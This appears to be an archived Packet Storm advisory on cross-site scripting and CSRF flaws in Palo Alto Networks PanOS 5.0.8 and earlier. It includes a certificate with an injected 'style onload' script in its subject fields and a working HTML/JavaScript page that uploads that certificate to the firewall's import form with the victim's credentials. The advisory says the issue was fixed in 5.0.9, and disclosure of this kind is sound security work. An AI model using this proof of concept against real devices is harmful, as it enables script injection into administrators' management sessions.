what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Palo Alto Networks PanOS 5.0.8 XSS / CSRF

Palo Alto Networks PanOS 5.0.8 XSS / CSRF
Posted Nov 26, 2013
Authored by Thomas Pollet

Palo Alto Networks PanOS versions 5.0.l8 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 0128c8519b469367add23f825da0f04e65d811cb5874370e064fdbed3fe6a5fc

Palo Alto Networks PanOS 5.0.8 XSS / CSRF

Change Mirror Download
Palo Alto Networks PANOS <= 5.0.8 XSS

A couple of bugs exist in Palo Alto Networks PANOS <= 5.0.8 which can be exploited to conduct cross-site scripting attacks.

Certificate fields are displayed in the firewall web interface without proper sanitization applied to them. This way it is possible to inject html into the web interface.

Various file upload forms used by the firewall do not implement proper CSRF protection. import.certificate.php for example.



Example of a certificate containing html that will be rendered:

Certificate:
Data:
Version: 1 (0x0)
Serial Number:
e5:67:53:d1:e4:2a:71:ec
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd
Validity
Not Before: Oct 1 16:28:18 2013 GMT
Not After : Oct 1 16:28:18 2014 GMT
Subject: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (1024 bit)
Modulus:
00:b1:d1:b4:9a:58:5e:20:99:15:03:f0:38:e5:dd:
11:f1:f1:14:26:3b:aa:6e:6b:c1:c1:28:01:be:d3:
93:e8:b5:fb:2e:a8:89:b2:87:56:93:54:60:a6:0c:
40:85:31:f8:9d:fd:00:0e:2f:f1:58:e6:a5:8a:0a:
67:57:70:06:13:02:2e:68:44:8b:a1:23:b1:bd:27:
d4:88:9d:f1:44:76:65:bb:e4:70:b5:fe:9c:21:57:
6a:11:df:56:b5:5d:c7:18:b9:b1:9a:81:c9:ae:80:
16:9d:11:76:e1:6f:a8:94:dd:01:02:c7:87:7e:cc:
b0:06:69:d5:84:79:64:45:d3
Exponent: 65537 (0x10001)
Signature Algorithm: sha1WithRSAEncryption
03:12:b6:12:74:67:8f:ac:e0:5f:02:31:b3:63:10:78:33:9d:
5e:c0:14:d9:d9:f6:ab:17:45:d3:fa:37:b8:c6:15:7c:24:a4:
83:61:c6:8c:92:1d:2b:2b:0d:f9:84:79:e7:db:26:07:63:e4:
9b:3a:3c:5f:a4:31:99:4e:79:30:95:a3:ce:86:9c:09:fa:e0:
3d:7b:c1:c4:ec:7a:79:b3:9c:7f:e2:36:3e:f2:40:cf:c0:57:
b0:4c:99:18:76:14:23:30:da:b3:90:2d:cd:af:65:80:bc:db:
db:3f:9e:44:a1:2e:5e:e2:29:83:ff:29:ec:17:df:8f:7b:55:
5d:ed


Example html source code to CSRF POST this rogue cert :

PA: <input type="text" id="url" value="https://10.10.10.22">
<input type=button onclick="upload()" value="Upload Certificate"/>
<hr>
<textarea rows=80 cols=80 id=text>
-----------------------------
Content-Disposition: form-data; name="ext-comp-2304"
on
-----------------------------
Content-Disposition: form-data; name="certFile"; filename="server.crt"
Content-Type: application/octet-stream
-----BEGIN CERTIFICATE-----
MIICXTCCAcYCCQDlZ1PR5Cpx7DANBgkqhkiG9w0BAQUFADBzMQswCQYDVQQGEwJY
WDEvMC0GA1UECAwmPHN0eWxlIG9ubG9hZD0iamF2YXNjcmlwdDphbGVydCgxKSIg
Lz4xFTATBgNVBAcMDERlZmF1bHQgQ2l0eTEcMBoGA1UECgwTRGVmYXVsdCBDb21w
YW55IEx0ZDAeFw0xMzEwMDExNjI4MThaFw0xNDEwMDExNjI4MThaMHMxCzAJBgNV
BAYTAlhYMS8wLQYDVQQIDCY8c3R5bGUgb25sb2FkPSJqYXZhc2NyaXB0OmFsZXJ0
KDEpIiAvPjEVMBMGA1UEBwwMRGVmYXVsdCBDaXR5MRwwGgYDVQQKDBNEZWZhdWx0
IENvbXBhbnkgTHRkMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCx0bSaWF4g
mRUD8Djl3RHx8RQmO6pua8HBKAG+05PotfsuqImyh1aTVGCmDECFMfid/QAOL/FY
5qWKCmdXcAYTAi5oRIuhI7G9J9SInfFEdmW75HC1/pwhV2oR31a1XccYubGagcmu
gBadEXbhb6iU3QECx4d+zLAGadWEeWRF0wIDAQABMA0GCSqGSIb3DQEBBQUAA4GB
AAMSthJ0Z4+s4F8CMbNjEHgznV7AFNnZ9qsXRdP6N7jGFXwkpINhxoySHSsrDfmE
eefbJgdj5Js6PF+kMZlOeTCVo86GnAn64D17wcTsenmznH/iNj7yQM/AV7BMmRh2
FCMw2rOQLc2vZYC829s/nkShLl7iKYP/KewX3497VV3t
-----END CERTIFICATE-----
-----------------------------
Content-Disposition: form-data; name="ext-comp-2306"
Base64 Encoded Certificate (PEM)
-----------------------------
Content-Disposition: form-data; name="keyFile"; filename=""
Content-Type: application/octet-stream
-----------------------------
Content-Disposition: form-data; name="bImportCertificateSubmit"
OK
-----------------------------
Content-Disposition: form-data; name="certFileC"
server.crt
-----------------------------
Content-Disposition: form-data; name="vsysC"
shared
-----------------------------
Content-Disposition: form-data; name="passPhrase"
-----------------------------
Content-Disposition: form-data; name="keyFileC"
-----------------------------
Content-Disposition: form-data; name="certName"
TPOLLET
-----------------------------
Content-Disposition: form-data; name="format"
pem
-----------------------------
Content-Disposition: form-data; name="includekey"
-----------------------------
Content-Disposition: form-data; name="certType"
device
-----------------------------
Content-Disposition: form-data; name="template"
-------------------------------
</textarea>
<script>
function upload() {
text = document.getElementById('text').value
host = document.getElementById('url').value;
url = host + "/php/device/import.certificate.php";
xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true);
xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------");
xhr.send(text);
alert('check ' + host + '/#device::vsys1::device/certificate-management/certificates' );
}
</script>


These issues have been fixed in PANOS 5.0.9, mentioned in the release notes like this:

57343—Fixed an issue that caused improper handling of imported certificates that contained HTML.

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close